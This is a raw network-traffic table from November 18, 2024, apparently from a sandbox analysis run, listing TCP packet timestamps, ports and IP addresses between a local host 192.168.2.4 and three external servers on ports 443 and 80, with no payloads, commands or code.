Nov 18, 2024 18:37:26.726788998 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.726808071 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726870060 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.726875067 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727164030 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727221012 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.727226019 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727278948 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727333069 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.727336884 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727372885 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727437019 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.727442026 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727473974 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727570057 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727582932 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.727588892 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727648973 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727693081 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.727693081 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.727698088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727718115 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.727727890 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.727768898 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.727773905 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.728460073 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.728509903 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.728540897 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.728544950 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.728641033 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.747991085 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.748155117 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.748159885 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.748207092 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.748286963 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.748292923 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.800776958 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.823453903 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.823549986 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.823556900 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.823606014 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.823673964 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.823678970 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.823920965 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.823982954 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.823987961 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.824210882 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.824290037 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.824311972 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.824316978 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.824357986 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.867078066 CET	443	49731	142.215.209.78	192.168.2.4
Nov 18, 2024 18:37:26.867208004 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:26.872665882 CET	49731	443	192.168.2.4	142.215.209.78
Nov 18, 2024 18:37:29.888891935 CET	49730	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.135199070 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.140031099 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.140187025 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.140311956 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.145561934 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.823004007 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.823098898 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.823112011 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.823164940 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.823468924 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.823482990 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.823494911 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.823522091 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.823600054 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.824312925 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.824326992 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.824338913 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.824395895 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.825136900 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.825189114 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.829281092 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.829503059 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.829514980 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.829607964 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.885965109 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.947860003 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.948029995 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.948069096 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.948098898 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.948548079 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.948584080 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.948602915 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.949060917 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.949096918 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.949120045 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.949135065 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.949198008 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.949867964 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.949904919 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.949959993 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.950397015 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.950432062 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.950467110 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.950493097 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.951252937 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.951288939 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.951308966 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.951714039 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.951749086 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.951781988 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.951783895 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.951983929 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.952573061 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.952609062 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.952642918 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.952671051 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.953461885 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.953500032 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.953516006 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:42.953792095 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:42.953844070 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:43.063627958 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:43.063797951 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:43.063833952 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:43.063873053 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:43.063961029 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:43.063961029 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:43.064490080 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:43.064524889 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:43.064558029 CET	80	49738	107.172.44.178	192.168.2.4
Nov 18, 2024 18:37:43.064588070 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:43.113387108 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:37:43.116134882 CET	49738	80	192.168.2.4	107.172.44.178
Nov 18, 2024 18:38:07.959789991 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:07.976816893 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:07.976937056 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:07.977413893 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:07.977498055 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:07.991450071 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:07.999051094 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.197149992 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.197285891 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.197300911 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.197379112 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.197504997 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.197519064 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.197536945 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.197551012 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.197583914 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.197912931 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.197995901 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.198040962 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.198194027 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.198208094 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.198257923 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.212990046 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.213233948 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.213294029 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.213498116 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.213515997 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.213556051 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.214406013 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.269649029 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.361006021 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.361103058 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.361118078 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.361159086 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.361388922 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.361433983 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.362128973 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.362426043 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.362474918 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.363193989 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.363471031 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.363518953 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.364003897 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.364299059 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.364342928 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.364829063 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.365003109 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.365046978 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.365787029 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.365900993 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.365941048 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.366729975 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.366933107 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.366985083 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.367724895 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.367840052 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.367891073 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.368571997 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.368736982 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.368786097 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.369658947 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.369827986 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.369880915 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.370501995 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.370651007 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.370697021 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.371455908 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.425827980 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.524645090 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.524754047 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.524811029 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.524951935 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.524967909 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.525018930 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.525454044 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.525976896 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.526035070 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.526181936 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.526200056 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.526241064 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.526982069 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.527076006 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.527122021 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.527653933 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.527745008 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.527805090 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.528621912 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.528701067 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.528748989 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.529069901 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.529232979 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.529284000 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.529855013 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.530054092 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.530106068 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.530927896 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.531069994 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.531116962 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.531286955 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.531488895 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.531533957 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.532367945 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.532385111 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.532430887 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.533621073 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.533811092 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.533844948 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.533859015 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.534342051 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.534389019 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.534575939 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.534591913 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.534643888 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.535192013 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.535535097 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.535586119 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.535856962 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.536134958 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.536184072 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.537595987 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.537611961 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.537671089 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.538144112 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.538158894 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.538201094 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.538638115 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.538655043 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.538711071 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.539211035 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.539227009 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.539267063 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.540977001 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.541099072 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.541141987 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.541384935 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.541615963 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.541657925 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.542016029 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.542136908 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.542181015 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.691772938 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.692018032 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.692033052 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.692049980 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.692061901 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.692080021 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.692090988 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.692816973 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.692833900 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.692864895 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.693213940 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.693229914 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.693254948 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.693268061 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.693305969 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.693810940 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.693826914 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.693842888 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.693859100 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.693871021 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.693898916 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.694510937 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.694533110 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.694549084 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.694566011 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.694574118 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.694614887 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.695372105 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.695388079 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.695403099 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.695445061 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.695879936 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.695894957 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.695913076 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.695926905 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.695939064 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.695955992 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.696801901 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.696818113 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.696832895 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.696850061 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.696875095 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.696887970 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.697561026 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.697582006 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.697597027 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.697607994 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.697623014 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.697637081 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.698465109 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.698482037 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.698503971 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.698517084 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.698533058 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.698551893 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.698559046 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.698587894 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.700229883 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.700324059 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.700365067 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.700385094 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.700407982 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.700460911 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.700653076 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.700684071 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.700723886 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.701138020 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.701154947 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.701196909 CET	49781	80	192.168.2.4	46.173.214.24
Nov 18, 2024 18:38:09.701234102 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.701250076 CET	80	49781	46.173.214.24	192.168.2.4
Nov 18, 2024 18:38:09.701297998 CET	49781	80	192.168.2.4	46.173.214.24
